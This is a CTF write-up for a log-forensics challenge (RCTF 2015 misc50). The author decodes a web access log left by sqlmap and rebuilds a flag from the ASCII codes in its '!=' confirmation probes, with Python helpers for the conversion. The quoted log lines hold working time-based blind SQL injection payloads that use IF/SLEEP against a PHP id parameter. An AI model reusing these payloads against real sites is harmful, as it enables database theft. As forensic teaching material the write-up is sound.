This is my first write-up. There is already a write-up for this challenge online; when I read it earlier I thought the steps were far too complicated and didn't look closely. I have just redone the challenge and found there is really nothing hard about it...

In this challenge you are given a log file. Change the extension of the log to .rar and extract it; inside you find the real log file, whose contents look like this.

Xipu CTF - 2015 RCTF (misc50) - 以夕阳落款

Does this look familiar? Anyone who has used sqlmap recognises it at once: this is the web server access log from an sqlmap run, and it contains every statement it sent to enumerate table names, column names, column contents and so on. We are after the flag, so Ctrl+F for "flag" turns up the following lines.

/phpcode/rctf/misc/index.php?id=1%20AND%203720%3DIF%28%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%20FROM%20misc.flag%29%2C1%2C1%29%29%3E51%29%2CSLEEP%281%29%2C3720%29 HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:06 -0800] "GET /phpcode/rctf/misc/index.php?id=1%20AND%203720%3DIF%28%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%20FROM%20misc.flag%29%2C1%2C1%29%29%3E48%29%2CSLEEP%281%29%2C3720%29 HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:06 -0800] "GET /phpcode/rctf/misc/index.php?id=1%20AND%203720%3DIF%28%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%20FROM%20misc.flag%29%2C1%2C1%29%29%3E49%29%2CSLEEP%281%29%2C3720%29 HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:06 -0800] "GET /phpcode/rctf/misc/index.php?id=1%20AND%203720%3DIF%28%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%20FROM%20misc.flag%29%2C1%2C1%29%29%21%3D49%29%2CSLEEP%281%29%2C3720%29 HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:06 -0800] "GET /phpcode/rctf/misc/index.php?id=1%20AND%203720%3DIF%28%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%20FROM%20misc.flag%29%2C2%2C1%29%29%3E51%29%2CSLEEP%281%29%2C3720%29 HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:06 -0800] "GET /phpcode/rctf/misc/index.php?id=1%20AND%203720%3DIF%28%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%20FROM%20misc.flag%29%2C2%2C1%29%29%3E48%29%2CSLEEP%281%29%2C3720%29 HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:06 -0800] "GET /phpcode/rctf/misc/index.php?id=1%20AND%203720%3DIF%28%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20CHAR%29%2C0x20%29%20FROM%20misc.flag%29%2C2%2C1%29%29%3E1%29%2CSLEEP%281%29%2C3720%29 HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"

Many more lines follow; I have left them out because the log is simply too long. Drop the lines into a URL decoder and decode them. Here is a selection of the decoded lines.

192.168.52.1 - - [06/Nov/2015:19:33:07 -0800] "GET /phpcode/rctf/misc/index.php?id=1 AND 7500=IF((ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM misc.flag ORDER BY flag LIMIT 0,1),1,1))>64),SLEEP(1),7500) HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:07 -0800] "GET /phpcode/rctf/misc/index.php?id=1 AND 7500=IF((ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM misc.flag ORDER BY flag LIMIT 0,1),1,1))>96),SLEEP(1),7500) HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:08 -0800] "GET /phpcode/rctf/misc/index.php?id=1 AND 7500=IF((ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM misc.flag ORDER BY flag LIMIT 0,1),1,1))>80),SLEEP(1),7500) HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:08 -0800] "GET /phpcode/rctf/misc/index.php?id=1 AND 7500=IF((ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM misc.flag ORDER BY flag LIMIT 0,1),1,1))>88),SLEEP(1),7500) HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:08 -0800] "GET /phpcode/rctf/misc/index.php?id=1 AND 7500=IF((ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM misc.flag ORDER BY flag LIMIT 0,1),1,1))>84),SLEEP(1),7500) HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:08 -0800] "GET /phpcode/rctf/misc/index.php?id=1 AND 7500=IF((ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM misc.flag ORDER BY flag LIMIT 0,1),1,1))>82),SLEEP(1),7500) HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:09 -0800] "GET /phpcode/rctf/misc/index.php?id=1 AND 7500=IF((ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM misc.flag ORDER BY flag LIMIT 0,1),1,1))>81),SLEEP(1),7500) HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"
192.168.52.1 - - [06/Nov/2015:19:33:09 -0800] "GET /phpcode/rctf/misc/index.php?id=1 AND 7500=IF((ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM misc.flag ORDER BY flag LIMIT 0,1),1,1))!=82),SLEEP(1),7500) HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"

What do these tell us? sqlmap is dumping the flag column of the flag table by binary search: a run of ">" comparisons narrows each character down, and a final "!=" comparison confirms it. That makes things simple: we look for each place like "!=82", because the number in that confirmation check is the ASCII code of one extracted character. There are thirty of them in total.

[82,79,73,83,123,109,105,83,99,95,65,110,64,108,121,83,105,115,95,110,71,49,110,120,95,83,105,109,125,5]

I'm not entirely sure about the last value, 5, because that was as far as I had dragged into the URL decoder at the time, but it doesn't affect the flag, since that is an extra character. Convert these codes to characters; I wrote a simple conversion in Python, which you can use for reference.

# ASCII codes taken from the "!=" confirmation probes in the log, in position order
number = [82,79,73,83,123,109,105,83,99,95,65,110,64,108,121,83,105,115,95,110,71,49,110,120,95,83,105,109,125,5]
string2 = ''
for i in number:
    string = chr(i)            # one ASCII code -> one character
    string2 = string2 + string  # append it to the recovered flag
print(string2)
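The two manual steps above (pick out the "!=" confirmation probes, then turn the codes into characters) can be done directly on the raw, still URL-encoded access-log lines. This is an added example and not code from the original write-up; the log lines it runs on are constructed in the same format as the challenge file, reusing the queries, client IP, path and User-Agent quoted above, and one position is deliberately left unconfirmed to show how a gap in the log is reported.

```python
import re
from urllib.parse import quote, unquote

# Decoded sqlmap payload shape in the log: ...MID((SELECT ...),<pos>,1))<op><value>)..., <op> is '>' or '!='
PROBE_RE = re.compile(r"MID\(\((?P<query>SELECT .+?)\),(?P<pos>\d+),1\)\)(?P<op>>|!=)(?P<val>\d+)\)")

def parse_probe(raw_line):
    """URL-decode one access-log line; return (inner query, position, op, value) or None."""
    m = PROBE_RE.search(unquote(raw_line))
    return (m["query"], int(m["pos"]), m["op"], int(m["val"])) if m else None

def recover_strings(log_lines):
    """Rebuild every value sqlmap dumped, keyed by the inner SELECT that fetched it.

    The '>' probes are only binary-search steps; the final '!=' confirmation fixes the
    character, so only those are kept. A position never confirmed (truncated log) shows as '?'.
    """
    confirmed = {}
    for raw in log_lines:
        parsed = parse_probe(raw)
        if parsed and parsed[2] == "!=":
            query, pos, _, val = parsed
            confirmed.setdefault(query, {})[pos] = val
    return {q: "".join(chr(c[p]) if p in c else "?" for p in range(1, max(c) + 1))
            for q, c in confirmed.items()}

# --- constructed sample log in the format of the challenge file (not the real file) ---
FLAG_QUERY = "SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM misc.flag ORDER BY flag LIMIT 0,1"
COUNT_QUERY = "SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM misc.flag"

def _probe_line(query, pos, op, val):
    """One constructed combined-format log line carrying a time-based sqlmap probe."""
    payload = "1 AND 7500=IF((ORD(MID((%s),%d,1))%s%d),SLEEP(1),7500)" % (query, pos, op, val)
    return ('192.168.52.1 - - [06/Nov/2015:19:33:09 -0800] "GET /phpcode/rctf/misc/index.php?id=%s'
            ' HTTP/1.1" 200 5 "-" "sqlmap/1.0-dev (http://sqlmap.org)" "-"' % quote(payload, safe=""))

SAMPLE_LOG = (
    [_probe_line(COUNT_QUERY, 1, ">", v) for v in (51, 48, 49)] + [_probe_line(COUNT_QUERY, 1, "!=", 49)]
    + [_probe_line(FLAG_QUERY, 1, ">", v) for v in (64, 96, 80, 88, 84, 82, 81)] + [_probe_line(FLAG_QUERY, 1, "!=", 82)]
    + [_probe_line(FLAG_QUERY, 2, ">", v) for v in (64, 96, 80)]  # confirmation for position 2 is missing
    + [_probe_line(FLAG_QUERY, 3, ">", 64), _probe_line(FLAG_QUERY, 3, "!=", 73)]
    + ['192.168.52.1 - - [06/Nov/2015:19:33:10 -0800] "GET /phpcode/rctf/misc/index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"']
)

if __name__ == "__main__":
    for query, value in recover_strings(SAMPLE_LOG).items():
        print("%s -> %r" % (query, value))   # COUNT(*) -> '1', flag -> 'R?I'
```

Feeding the real challenge log to recover_strings line by line yields the same codes the author collected by hand, including the row count sqlmap read first.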

Finally we get the flag.

Flag:
